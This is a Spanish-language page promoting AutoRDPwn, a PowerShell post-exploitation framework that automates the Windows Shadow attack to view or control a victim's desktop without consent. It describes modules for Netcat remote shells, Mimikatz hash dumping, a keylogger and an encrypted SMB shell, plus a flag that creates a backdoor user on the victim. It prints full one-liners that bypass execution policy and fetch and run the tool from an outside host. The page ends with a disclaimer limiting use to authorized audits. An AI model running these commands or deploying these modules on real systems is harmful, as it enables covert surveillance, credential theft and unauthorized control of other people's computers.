AutoRDPwn Framework de Shadow Attack
AutoRDPwn Framework de Shadow Attack

AutoRDPwn: Framework de Ataque Shadow

AutoRDPwn es un marco post-explotación creado en Powershell, diseñado principalmente para automatizar el ataque Shadow (Shadow Attack) a los ordenadores con Microsoft Windows. Esta vulnerabilidad (listada como una característica por Microsoft) permite a un atacante remoto ver el escritorio de su víctima sin su consentimiento, e incluso controlarlo a petición, usando herramientas nativas del propio sistema operativo.

Gracias a los módulos adicionales, es posible obtener un shell remoto a través de Netcat, descargar hashes del sistema con Mimikatz, cargar un keylogger remoto y mucho más. Todo esto, a través de un menú completamente intuitivo en siete idiomas diferentes.

Además, es posible utilizarlo en una shell inversa a través de una serie de parámetros que se describen en la sección de uso.

Requisitos

Powershell 4.0 o superior

Cambios

Versión 5.1

• Muchos errores corregidos

• Mejoras estéticas y tiempos de espera mejorados

• Conexión de Proxy-Aware a través de la configuración del sistema

• Ahora es posible utilizar la herramienta offline descargando el archivo .zip

• Detección automática del idioma pulsando la tecla Enter

• Invoke-DCOM ha sido reemplazado por SharpRDP

• PowerUp ha sido reemplazado por Invoke-PrivescCheck

• Creación de subrutinas de limpieza automática en la víctima

• Nuevo módulo disponible: SMB Shell cifrado con AES

• Nuevo módulo disponible: Cambiar de usuario con RunAs

*El resto de los cambios pueden ser consultados en el archivo CHANGELOG

Uso

Esta aplicación puede utilizarse localmente, a distancia o para pivotar entre equipos.

Cuando se utiliza a distancia en shell inversa, es necesario utilizar los siguientes parámetros:

ParámetroDescripción
-admin / -noadminDependiendo de los permisos que tengamos, usaremos uno u otro
-noguiEsto evitará cargar el menú y algunos colores, garantizando su funcionalidad
-langEscogeremos nuestro idioma (inglés, español, francés, alemán, italiano, ruso o portugués)
-optionAl igual que con el menú, podemos elegir cómo lanzar el ataque
-shadowDecidiremos si queremos ver o controlar el dispositivo remoto
-createuserEste parámetro es opcional, el usuario AutoRDPwn:AutoRDPwn se creará en la máquina de la víctima
-nocleanDesactiva el proceso de deshacer todos los cambios en la computadora de la víctima

Ejecución local en una línea:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Ejemplo de ejecución remota en una línea:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

La guía detallada de uso se encuentra en el siguiente enlace: aquí (y en español)

Capturas de Pantalla

Captura de AutoRDPwn
Captura de AutoRDPwn
Opciones de AutoRDPwn
Opciones de AutoRDPwn

Licencia

Este proyecto está licenciado bajo la licencia GNU 3.0 – ver el archivo LICENSE para más detalles.

VER REPOSITORIO OFICIAL AQUÍ.

Aviso Legal

Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el correspondiente consentimiento del cliente. No me hago responsable de su mal uso o de los posibles daños causados por él.

Para más información, puede contactar a través de info@darkbyte.net

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda